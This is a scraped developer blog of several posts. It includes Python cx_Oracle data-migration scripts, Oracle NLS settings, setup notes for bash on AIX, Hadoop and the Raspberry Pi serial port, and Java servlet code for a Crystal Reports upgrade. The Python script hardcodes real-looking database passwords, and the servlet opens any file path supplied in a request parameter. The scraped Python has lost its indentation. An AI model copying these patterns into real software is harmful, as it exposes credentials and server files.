149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
import cx_Oracle, os

os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"

def trim(str):
if str == None:
return ''

def trim2(strs):
list = []
for i in strs:
if i == None:
list.append('')
else:
list.append(i)
return list

def generateSql(table, fields):
sql = 'insert into %s(%s) values (' %(table, ','.join(fields.split(',')) )
sql += ','.join(map(lambda x: ':' + x , fields.split(','))) + ')'
return sql

def generateValues(fields, row):
values = {}
f = fields.split(',')
for i in range(len(f)):
values[f[i]] = row[i]
return values

def district(cur, extCur):
return ('district', 'MODULE,CAT_ID,CODE,NAME,DIST_CODE,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,WAIT_COUNT,INSPECTION_DIST_CODE')


def misc(cur, extCur):
return ('misc', 'NAME,CODE,DESCR,REMARK,UPDATE_ROLE,WAIT_COUNT,LAST_UPDATE,UPDATE_BY,DD,MM,YEAR,PERIOD,TYPE,REMARK1,DENY_RANK,DURATION_PARAM,REPORT_ID,LIC_TYPE_PARAM,DUMMY_PROMPT,DESCR2')


def main():
os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"
dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='service-name')

con = cx_Oracle.connect('dhsms','useruat2621',dsn_tns)
extCon = cx_Oracle.connect('dhsms_int','useruat0675',dsn_tns)

cur = con.cursor()
extCur = extCon.cursor()
try:
table, fields = task()
sql = 'select %s from %s' %(','.join(fields.split(',')), table)
print sql
cur.execute(sql)
res = cur.fetchall()
for row in res:
extCur.execute(generateSql(table, fields), generateValues(fields, row))

extCon.commit()

cur.close()
extCur.close()
except cx_Oracle.DatabaseError, exc:
print exc
error, = exc.args
print error.message
finally:
print 'close connection'
con.close()
extCon.close()

def updateCompanyPublish():
uat_dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='uat')
prd_dsn_tns = cx_Oracle.makedsn('server-2', 1521, service_name='prd')

uat_con = cx_Oracle.connect('user','password',uat_dsn_tns)
prd_con = cx_Oracle.connect('user','password',prd_dsn_tns)

uat_cur = uat_con.cursor()
prd_cur = prd_con.cursor()

try:
prd_cur.execute("select bus_name, bus_name_chn, unit, FLOOR, BLOCK, bldg, st_no, st_name, area_code, brc, brc_br_code from company where brc in ('12813641','05566198','14304442','09774317','17347013','10161559','04052247','10197423','02410516','06508541','19231608','18405151','05528392','08239275','02577649','08593841','06534261','07286166','01491507','07665609','02718104','04502925','37614254','07919620','EXEMPT07','10492160','13343992','02545054','02725127','04795495','16191407','00039087','04452570','05419513','18766876','01244344','05134767','00559994')")
for row in prd_cur:
print row
uat_cur.execute('update company_publish set bus_name=:bus_name,bus_name_chn=:bus_name_chn,unit=:unit,floor=:floor,block=:block,bldg=:bldg,st_no=:st_no,st_name=:st_name,area_code =:area_code where brc = :brc and brc_br_code = :brc_br_code', {'bus_name':row[0], 'bus_name_chn':row[0],'bus_name_chn':row[1],'unit':row[2],'floor':row[3],'block':row[4],'bldg':row[5],'st_no':row[6],'st_name':row[7],'area_code':row[8],'brc':row[9],'brc_br_code':row[10]})

prd_cur.close()
uat_cur.close()
uat_con.commit()

finally:
uat_con.close()
prd_con.close()


#updateCompanyPublish()


def upgradeSeq():
dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='service-name')


extCon = cx_Oracle.connect('user','password',dsn_tns)
extCur = extCon.cursor()
for i in range(10000):
extCur.execute('select IE_DRUG_ID_SQ.NEXTVAL FROM DUAL')
extCur.close()
extCon.close()


def updateAddress():
f = open('advert_address.txt')
c = f.read()
f.close()
os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"
try:
dsn_tns = cx_Oracle.makedsn('server-2', 1521, 'sid')
con = cx_Oracle.connect('user','password',dsn_tns)
cur = con.cursor()


for line in c.splitlines():
parts = line.split('\t')
seq_no = parts[0]
source_name = parts[1]
publisher = parts[2]
address = parts[3]
fax = parts[4]
tel = parts[5]
print seq_no, source_name, publisher, address
sql = 'update advert_address set source_name = :source_name, publisher = :publisher, address = :address, fax = :fax, tel = :tel where seq_no = :seq_no'
cur.execute(sql, {'seq_no':seq_no, 'source_name':source_name, 'publisher':publisher, 'address':address, 'fax':fax, 'tel':tel})
cur.close()
con.commit()
finally:
print 'close connection'
con.close()


def updateCompanyName():
f = open('ML data.txt')
c = f.read()
f.close()

try:
dsn_tns = cx_Oracle.makedsn('server', 1521, 'psuat')
con = cx_Oracle.connect('user','password',dsn_tns)
cur = con.cursor()

for line in c.splitlines():
parts = line.split('\t')
name = parts[2]
file_no = parts[3]
if file_no != '':
print name, file_no
sql = 'update company_publish set bus_name_chn = :name where brc = (select brc from lic_app where file_no = :file_no)'
cur.execute(sql, {'name':name, 'file_no':file_no})

sql = 'update company set bus_name_chn = :name where brc = (select brc from lic_app where file_no = :file_no)'
cur.execute(sql, {'name':name, 'file_no':file_no})

cur.close()
con.commit()
finally:
print 'close connection'
con.close()


def updateUMAProdGroup():
f = open('uma_group.txt')
c = f.read()
f.close()

try:
dsn_tns = cx_Oracle.makedsn('server-2', 1521, 'sid')
con = cx_Oracle.connect('user','password',dsn_tns)
cur = con.cursor()

for line in c.splitlines():
parts = line.split('\t')
name = parts[0]
code = parts[1]
descr = parts[2]
if name != '':
print name, code, descr

sql = 'insert into misc(name, code, descr) values (:name, :code, :descr)'
cur.execute(sql, {'name':name, 'code':code, 'descr':descr})

cur.close()
con.commit()
finally:
print 'close connection'
con.close()

main()
#updateUMAProdGroup()

Insert Unicode Using cx-Oracle and Setting NLS_LANG for Oracle

set enviroment in python or bash

1
2
os.environ[“NLS_LANG”] = “TRADITIONAL CHINESE_HONG KONG.AL32UTF8” or
export NLS_LANG=“TRADITIONAL CHINESE_HONG KONG.AL32UTF8”

get lang in Oracle

1
2
3
SELECT USERENV ('language') FROM DUAL;
select * from v$nls_parameters WHERE parameter IN ( 'NLS_LANGUAGE', 'NLS_TERRITORY', 'NLS_CHARACTERSET');
SELECT * from NLS_DATABASE_PARAMETERS WHERE parameter IN ( 'NLS_LANGUAGE', 'NLS_TERRITORY', 'NLS_CHARACTERSET');

others

1
2
3
select * FROM V$NLS_VALID_VALUES;
select * from NLS_SESSION_PARAMETERS;
select * from database_properties;

bash on AIX

  • Donwload Bash
    goto http://www-03.ibm.com/systems/power/software/aix/linux/toolbox/alpha.html

    1
    2
    wget ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-4.2-1.aix6.1.ppc.rpm`
    rpm -ivh bash-4.2-1.aix6.1.ppc.rpm
  • Configure Bash
    simple way just type bash in shell
    change the default login shell
    append a line of /usr/bin/bash to file /etc/security/login.cfg
    type chsh in shell

Reference

how-set-bash-default-shell.html
bash-initialization-shell-is-command
bash-key-bindings

hadoop on nitrous.io

Prepare SSH

1
2
3
ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
cat ~/.ssh/id_dsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Configuration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
vim /home/action/software/hadoop-1.2.1/conf/hadoop-env.sh
export JAVA_HOME=/usr/lib/jvm/java-7-oracle

bin/hadoop namenode -format

bin/hadoop fs -mkdir input
bin/hadoop fs -put conf input
bin/hadoop fs -cp conf/*.xml input

bin/start-all.sh

bin/hadoop jar hadoop-examples-1.2.1.jar grep input output 'dfs[a-z.]+'
bin/hadoop fs -rmr output

bin/hadoop jar hadoop-examples-1.2.1.jar wordcount input output
bin/hadoop fs -rmr output

bin/stop-all.sh

core-site.xml

1
2
3
4
5
6
7
8
9
10
<configuration>
<property>
<name>fs.default.name</name>
<value>hdfs://localhost:9000</value>
</property>
  <property>
    <name>hadoop.tmp.dir</name>
    <value>/home/action/tmp</value>
  </property>
</configuration>

hdfs-site.xml

1
2
3
4
5
6
<configuration>
<property>
<name>dfs.replication</name>
<value>1</value>
</property>
</configuration>

mapred-site.xml

1
2
3
4
5
6
<configuration>
<property>
<name>mapred.job.tracker</name>
<value>localhost:9001</value>
</property>
</configuration>

hadoop.tmp.dir must be set, or it will throw error

admin interface

Reference

angelosun.iteye.com
shaurong.blogspot.hk
blog.csdn.net

nitrous.io初探

1. Register account

register git
register heroku
register mongolab
create a workspace of nodejs

2. Download package

1
2
3
4
apache-maven-3.1.0-bin.tar.gz
hadoop-1.2.1-bin.tar.gz
Dropbox-Uploader
lynx2.8.7.tar.gz

Command

1
2
3
4
5
6
7
8
npm init
npm install express -g
npm install grunt-cli -g
npm install grunt-init -g
npm install socket.io
npm install forever -g
npm install coffee-script -g
npm install nodemon -g

3. heroku

heroku login
heroku create

run java -cp target/classes:target/dependency/* hello.App
in nitrous then preview http://my-awesome-box-30153.apne1.nitrousbox.com/
git commit -a && git push heroku master then preivew http://agile-thicket-5152.herokuapp.com/

getting-started-with-java
create-a-java-web-application-using-embedded-tomcat
war-deployment

login RPi via serial port

Since I have bought a product from adafruit, I need to know how to connect my RPi from PC via serial port.

Login via Serial port

By default, RPi can be login via serial port due to program getty is running configured in /etc/inittab

Bootup info

When RPi boots up, it would send boot info to serial port since the file /boot/cmdline.txt.

Disable serial port when boots up

  • add # character to the begining in file /etc/inittab
    T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100
  • Remove all reference to ttyAMA0 in file /boot/cmdline.txt
    From
    1
    2
    dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2 
    rootfstype=ext4 elevator=deadline rootwait`
    To
    dwc_otg.lpm_enable=0 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline rootwait

Reboot

sudo reboot

Test the serial port

  • stty -F /dev/ttyAMA0 9600
  • minicom -b 9600 -o -D /dev/ttyAMA0
  • python serial
    1
    2
    ser = serial.Serial("/dev/ttyAMA0",9600)
    ser.open()

Reference:

Raspberry Pi and the Serial Port
get terminal access to Pi over USB/serial cable
RPi_Serial_Connection
raspberry-pi-and-arduino-connected-serial-gpio
Raspberry Pi Serial Console With MAX3232CPE

升级Crystal Report 8.5 to Crystal Report 2011

升级过程中有两点需要注意:

  • 在AIX安装字体,繁体就用新细明体mingliu.ttf和mingliub.ttf(粗体),英文就用Times New Roman:times.ttf,timesbd.ttf,timesbi.ttf,timesi.ttf。
  • 设置Locale,因不知为何在AIX上生成的PDF文件编码总是日文语系的,当设置完Locale后问题才得以解决,reportClientDoc.setLocale(Locale.TRADITIONAL_CHINESE);
  • 运行时动态改变datasource的jndi,在oralce上尝试几个方法都失败,但感觉这些code都应该有参考价值的,也会列出来。

ReportServlet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
package dh.report;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Calendar;
import java.util.Collections;
import java.util.Date;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.crystaldecisions.report.web.viewer.CrPrintMode;
import com.crystaldecisions.report.web.viewer.CrystalReportViewer;
import com.crystaldecisions.report.web.viewer.ReportExportControl;
import com.crystaldecisions.sdk.occa.report.application.ISubreportClientDocument;
import com.crystaldecisions.sdk.occa.report.application.ReportClientDocument;
import com.crystaldecisions.sdk.occa.report.data.Fields;
import com.crystaldecisions.sdk.occa.report.data.ParameterField;
import com.crystaldecisions.sdk.occa.report.data.ParameterFieldDiscreteValue;
import com.crystaldecisions.sdk.occa.report.exportoptions.ExportOptions;
import com.crystaldecisions.sdk.occa.report.exportoptions.ReportExportFormat;
import com.crystaldecisions.sdk.occa.report.lib.IStrings;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKException;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKExceptionBase;
import com.crystaldecisions.sdk.occa.report.reportsource.IReportSource;

public class ReportServlet extends HttpServlet {

public static String JNDI_NAME = "java:comp/env/jdbc/psuat";

//public static String JNDI_NAME = "jdbc/dhprd";

@Override
public void init(ServletConfig config) throws ServletException {
String fontsPath = config.getServletContext().getRealPath("/") + "/WEB-INF/lib/fonts/";
System.out.println("real path " + fontsPath);
try {
/*GraphicsEnvironment ge = GraphicsEnvironment.getLocalGraphicsEnvironment();
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "mingliu.ttf")));
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "mingliub.ttf")));
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "times.ttf")));
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesbd.ttf")));
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesbi.ttf")));
ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesi.ttf")));

String fonts[] = GraphicsEnvironment.getLocalGraphicsEnvironment().getAvailableFontFamilyNames();

for (int i = 0; i < fonts.length; i++) {
System.out.println("System font " + fonts[i]);
}*/

} catch (Exception e) {
e.printStackTrace();
}
}

@Override
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
doGet(req, resp);
}

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

String report = req.getParameter("report");
if (report != null) {
report = report.replace("file:", "");

if ("127.0.0.1".equals(req.getLocalAddr()) || "10.13.135.40".equals(req.getLocalAddr())) {
report = report.replace("/piers/apps/uat/installedApps/DHApps.ear/dh.war/rpt", "");
} else {
if (report.indexOf("uat") != -1) {
report = report.replace("/piers/apps/uat", "/dh/apps/prod");
}
}
}

// List<String> promptValues = retrieveParameterValues(req);

System.out.println("report = " + report);

ReportClientDocument reportClientDoc = new ReportClientDocument();

Map parameterMap = new HashMap();

try {
reportClientDoc.setLocale(Locale.TRADITIONAL_CHINESE);

reportClientDoc.open(report, 0);

ReportUtil.switch_tables(reportClientDoc.getDatabaseController());

//Perform the same operation against all tables in the subreport as well.
IStrings subreportNames = reportClientDoc.getSubreportController().getSubreportNames();

//Set the datasource for all the subreports.
for (int i = 0; i < subreportNames.size(); i++) {
ISubreportClientDocument subreportClientDoc = reportClientDoc.getSubreportController().getSubreport(
subreportNames.getString(i));

//Switch tables for each subreport in the report using the same connection information. See utility
//method below.
ReportUtil.switch_tables(subreportClientDoc.getDatabaseController());

}

Fields paraFields = reportClientDoc.getDataDefinition().getParameterFields();

for (int i = 0; i < paraFields.size(); i++) {
String value = "";

// get pre-set value
ParameterField field = (ParameterField) paraFields.get(i);
if (field.getValues() != null && field.getValues().size() > 0) {
ParameterFieldDiscreteValue v = (ParameterFieldDiscreteValue) field.getValues().get(0);
value = v.getValue().toString();
}

String paramValue = req.getParameter("prompt" + i);
System.out.println("paramValue = " + paramValue);
if (paramValue != null) {
value = paramValue;
if (value.indexOf("Date") != -1) {
parameterMap.put(field.getName(), getDate(value));
} else {
parameterMap.put(field.getName(), value);
}
} else {
parameterMap.put(field.getName(), value);
}
}

Fields fields = ReportUtil.prepareParameter(report, parameterMap);

IReportSource reportSource = reportClientDoc.getReportSource();

showByPdf(reportSource, fields, req, resp);
} catch (ReportSDKException e) {
e.printStackTrace();
} catch (ReportSDKExceptionBase e) {
e.printStackTrace();
}

}

private void showByPdf(IReportSource reportSource, Fields fields, HttpServletRequest req, HttpServletResponse resp)
throws ReportSDKExceptionBase {
ExportOptions exportOptions = new ExportOptions();
exportOptions.setExportFormatType(ReportExportFormat.PDF);

ReportExportControl exportControl = new ReportExportControl();
exportControl.setReportSource(reportSource);
exportControl.setExportOptions(exportOptions);
exportControl.setExportAsAttachment(false);
exportControl.setParameterFields(fields);
exportControl.setOwnPage(true);

exportControl.processHttpRequest(req, resp, req.getSession().getServletContext(), null);

exportControl.dispose();
}

private void showByHtml(IReportSource reportSource, Fields fields, HttpServletRequest req, HttpServletResponse resp)
throws ReportSDKExceptionBase, IOException {
//JPEReportSourceFactory rptSrcFactory = new JPEReportSourceFactory();
//Object reportSource =rptSrcFactory.createReportSource(report,Locale.TRADITIONAL_CHINESE);
CrystalReportViewer viewer = new CrystalReportViewer();

viewer.setReportSource(reportSource);
viewer.setPrintMode(CrPrintMode.ACTIVEX);
viewer.setParameterFields(fields);
viewer.setOwnPage(true);
String html = viewer.getHtmlContent(req, resp, getServletContext());
System.out.println("html = " + html);

resp.setHeader("Cache-Control", "no-cache, post-check=0, pre-check=0");
resp.setContentType("text/html");
resp.setCharacterEncoding("UTF-8");

viewer.processHttpRequest(req, resp, req.getSession().getServletContext(), resp.getWriter());
viewer.dispose();
}

private List<String> retrieveParameterValues(HttpServletRequest req) {
List<String> parameterValues = new ArrayList<String>();
Enumeration<String> e = req.getParameterNames();
List<String> paraNames = new ArrayList<String>();

while (e.hasMoreElements()) {
String paramName = e.nextElement();
paraNames.add(paramName);
}

Collections.sort(paraNames);
for (String paramName : paraNames) {
String paramValue = req.getParameter(paramName);

System.out.println("paramName = " + paramName + ", paramValue = " + paramValue);
if (paramName.startsWith("prompt")) {
System.out.println("prompt = " + paramValue);
parameterValues.add(paramValue);
}
}

return parameterValues;
}

private Date getDate(String date) {
Calendar c = Calendar.getInstance();
Pattern p = Pattern.compile("Date\\((\\d+),(\\d+),(\\d+)\\)");
Matcher m = p.matcher(date);
if (m.matches()) {
System.out.println("year " + m.group(1) + ",month " + m.group(2) + ", date " + m.group(3));
c.set(Calendar.YEAR, Integer.parseInt(m.group(1)));
c.set(Calendar.MONTH, Integer.parseInt(m.group(2)));
c.set(Calendar.DAY_OF_MONTH, Integer.parseInt(m.group(3)));
}
return c.getTime();
}
}

ReportUtil

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
package dh.report;

import java.util.Iterator;
import java.util.Map;

import javax.servlet.http.HttpSession;

import com.crystaldecisions.report.web.viewer.ReportExportControl;
import com.crystaldecisions.sdk.occa.report.application.DBOptions;
import com.crystaldecisions.sdk.occa.report.application.DatabaseController;
import com.crystaldecisions.sdk.occa.report.application.ReportClientDocument;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfo;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfoKind;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfos;
import com.crystaldecisions.sdk.occa.report.data.Fields;
import com.crystaldecisions.sdk.occa.report.data.IConnectionInfo;
import com.crystaldecisions.sdk.occa.report.data.ITable;
import com.crystaldecisions.sdk.occa.report.data.ParameterField;
import com.crystaldecisions.sdk.occa.report.data.ParameterFieldDiscreteValue;
import com.crystaldecisions.sdk.occa.report.data.Tables;
import com.crystaldecisions.sdk.occa.report.data.Values;
import com.crystaldecisions.sdk.occa.report.lib.PropertyBag;
import com.crystaldecisions.sdk.occa.report.lib.PropertyBagHelper;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKException;

public class ReportUtil {

public static Object getReportSource(HttpSession session, String reportName) throws ReportSDKException {
System.out.println("getReportSource() ---------- start ----------------- \n reportName=" + reportName
+ "\n session=" + session);
// if(session==null || reportName==null){
// return null ;
// }

Object reportSource = session.getAttribute("reportSource");

if (reportSource == null) {
System.out.println("getReportSource() ......... reportSource == null , create reportSource");
ReportClientDocument reportClientDoc = new ReportClientDocument();
reportClientDoc.open(reportName, 0);
reportSource = reportClientDoc.getReportSource();
session.setAttribute("reportSource", reportSource);
}
System.out.println("getReportSource() ---------- finish ----------------- \n reportSource=" + reportSource);
return reportSource;

}

public static ParameterField createParameter(String parameterName, Object parameterValue) {
System.out.println("createParameter() ---------- start ----------------- \t parameterName=" + parameterName
+ "\t parameterValue=" + parameterValue);
ParameterField pfield = new ParameterField();
pfield.setName(parameterName);
pfield.setReportName("");

Values vals = new Values();
ParameterFieldDiscreteValue pfieldDV = new ParameterFieldDiscreteValue();
pfieldDV.setValue(parameterValue);
vals.add(pfieldDV);

pfield.setCurrentValues(vals);

return pfield;
}

public static Fields prepareParameter(String reportTemplateFileName, Map parameterMap) {
// logger.info("prepareParameter() ---------- start ----------------- \t parameterName=" + parameterName + "\t parameterValue=" + parameterValue) ;
System.out.println("prepareParameter() ---------- start ----------------- \t reportTemplateFileName="
+ reportTemplateFileName + "\t parameterMap=" + parameterMap);

Fields fields = null;

if (parameterMap != null) {
fields = new Fields();
for (Iterator itr = parameterMap.keySet().iterator(); itr.hasNext();) {
String key = (String) itr.next();
if (key != null) {
Object value = parameterMap.get(key);
fields.add(ReportUtil.createParameter(key, value));
System.out.println("put parameter " + key + " : " + value);
}
}
}

System.out.println("prepareParameter() ---------- Finish ----------------- \t fields=" + fields);

return fields;
}

/*
// ref: Crystal report official tutorial
public static void changeDataSource(ReportClientDocument rcd) throws ReportSDKException
{

System.out.println("changeDataSource() ---------- start ----------------- \t rcd=" + rcd);
DatabaseController databaseController = rcd.getDatabaseController();
ConnectionInfos connectionInfos = (ConnectionInfos)databaseController.getConnectionInfos(null);
IConnectionInfo oldConnectionInfo = connectionInfos.getConnectionInfo(0);
IConnectionInfo newConnectionInfo = new ConnectionInfo();

newConnectionInfo.setKind(ConnectionInfoKind.SQL);

PropertyBag newProperties = new PropertyBag();
newProperties.putStringValue("DSN", "Xtreme Sample Database 2005");
newProperties.put("UseDSNProperties", false);
newProperties.putStringValue(PropertyBagHelper.CONNINFO_SERVER_NAME, "Xtreme Sample Database 2005");
newProperties.putStringValue(PropertyBagHelper.CONNINFO_SERVER_TYPE, "ODBC (RDO)");
newProperties.putStringValue(PropertyBagHelper.CONNINFO_DATABASE_DLL, "crdb_odbc.dll");

newConnectionInfo.setAttributes(newProperties);
newConnectionInfo.setUserName("guest");
newConnectionInfo.setPassword("bobobo");

try
{
databaseController.replaceConnection(oldConnectionInfo, newConnectionInfo, null, DBOptions._useDefault);
}
catch (ReportSDKException error)
{
System.out.println(error.getSDKError());
}

System.out.println("changeDataSource() ---------- finish ----------------- ");
}
*/

// Change the document's all table's source to a JNDI, 实际上是不行的
// ref: http://scn.sap.com/thread/1688419
public static void changeDB(ReportClientDocument rcd, String reportJndiName) {
System.out.println("changeDB() ---------- start ----------------- \t rcd=" + rcd + "\t change to JNDI:"
+ reportJndiName);
DatabaseController databaseController;
try {
databaseController = rcd.getDatabaseController();

IConnectionInfo connectionInfo = new ConnectionInfo();
PropertyBag propertyBag = new PropertyBag();
propertyBag.put("JNDI Datasource Name", reportJndiName);
propertyBag.put("Use JDBC", "true");
// by Ricky
// propertyBag.put("Database DLL", DATABASE_DLL); // required!!! (but we don't actually provide a DLL, or even run in windows)
propertyBag.put(PropertyBagHelper.CONNINFO_DATABASE_DLL, "crdb_oracle.dll");

connectionInfo.setAttributes(propertyBag);
connectionInfo.setKind(ConnectionInfoKind.SQL);

ConnectionInfos connectionInfos = databaseController.getConnectionInfos(null);
IConnectionInfo oldConnectionInfo = connectionInfos.getConnectionInfo(0);

databaseController.replaceConnection(oldConnectionInfo, connectionInfo, null, DBOptions._useDefault);
} catch (ReportSDKException e) {
e.printStackTrace();
}

System.out.println("changeDB() ---------- finish ----------------- ");
}

// 全局性转换登录信息
public static void changeDB2(ReportClientDocument rcd, String reportJndiName) {
String DBUSERNAME = "dhdba";
String DBPASSWORD = "password";
String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
String SERVERTYPE = "JDBC (JNDI)";
String DATABASE_DLL = "crdb_oracle.dll";
String DATABASE = "server";
final String TRUSTEDCON = "false";
String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";
String USEJDBC = "true";
String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
String CONNECTIONURL = "jdbc:oracle:thin:@server:1521:sid";
String SERVER = "server";
final String DATABASE_NAME = "sid";

try {
System.out.println("change to " + reportJndiName);
// Set DB Username and Password
//rcd.getDatabaseController().logon(DBUSERNAME, DBPASSWORD);

// Create the two connectioninfo objects to use
IConnectionInfo oldConnectionInfo = new ConnectionInfo();
IConnectionInfo newConnectionInfo = new ConnectionInfo();

// Assign the old Connection info to the reports current info
DatabaseController dbController = rcd.getDatabaseController();
oldConnectionInfo = dbController.getConnectionInfos(null).getConnectionInfo(0);

// Create a new propertybag for the new location
PropertyBag boPropertyBag1 = new PropertyBag();

// Set new table logon properties
boPropertyBag1.put("JDBC Connection String", CONNECTION_STRING);
boPropertyBag1.put("Trusted_Connection", TRUSTEDCON);
boPropertyBag1.put("Server Type", SERVERTYPE);
boPropertyBag1.put("Database DLL", DATABASE_DLL);
boPropertyBag1.put("Database", DATABASE);
boPropertyBag1.put("Database Class Name", DBCLASSNAME);
boPropertyBag1.put("Use JDBC", USEJDBC);
boPropertyBag1.put("Database Name", DATABASE_NAME);
boPropertyBag1.put("Server Name", SERVERNAME);
boPropertyBag1.put("Connection URL", CONNECTIONURL);
boPropertyBag1.put("Server", SERVER);

// Assign the properties to the connection info
newConnectionInfo.setAttributes(boPropertyBag1);

// Set the DB Username and Pwd
newConnectionInfo.setUserName(DBUSERNAME);
newConnectionInfo.setPassword(DBPASSWORD);

// The Kind of connectionInfos is SQL
newConnectionInfo.setKind(ConnectionInfoKind.SQL);

// set the parameters to replace.
// The 4 options are:
// _doNotVerifyDB
// _ignoreCurrentTableQualifiers
// _mapFieldByRowsetPosition
// _useDefault
int replaceParams = DBOptions._ignoreCurrentTableQualifiers + DBOptions._doNotVerifyDB;
//int replaceParams = DBOptions._useDefault;

// Now replace the connections
dbController.replaceConnection(oldConnectionInfo, newConnectionInfo, null, replaceParams);

//Store the report source in session, will be used by the CrystalReportViewer.

} catch (ReportSDKException ex) {
ex.printStackTrace();
} catch (Exception ex) {
ex.printStackTrace();
}
}

// 对Report里每一Table进行转换
public static void changeDB3(ReportClientDocument rcd, String reportJndiName) {
final String TABLE_NAME_QUALIFIER = "dhdba.";
final String DBUSERNAME = "dhdba";
final String DBPASSWORD = "password";
String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
final String DATABASE_NAME = "dhdba";
final String URI = "!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:@server:1521:sid";
String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
final String DATABASE_DLL = "crdb_jdbc.dll";
String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";

try {
DatabaseController dbController = rcd.getDatabaseController();
Tables tables = dbController.getDatabase().getTables();
for (int i = 0; i < tables.size(); i++) {

ITable table = tables.getTable(i);

//Keep existing name and alias.
table.setName(table.getName());
table.setAlias(table.getAlias());
System.out.println("getName " + table.getName());
System.out.println("getAlias" + table.getAlias());
//Change properties that are different from the original datasource.
table.setQualifiedName(TABLE_NAME_QUALIFIER + table.getName());

//Change connection information properties.
IConnectionInfo connectionInfo = table.getConnectionInfo();
connectionInfo.getAttributes().clear();
//Set new table connection property attributes.
PropertyBag propertyBag = new PropertyBag();

//Overwrite any existing properties with updated values.
propertyBag.put("Trusted_Connection", "false");
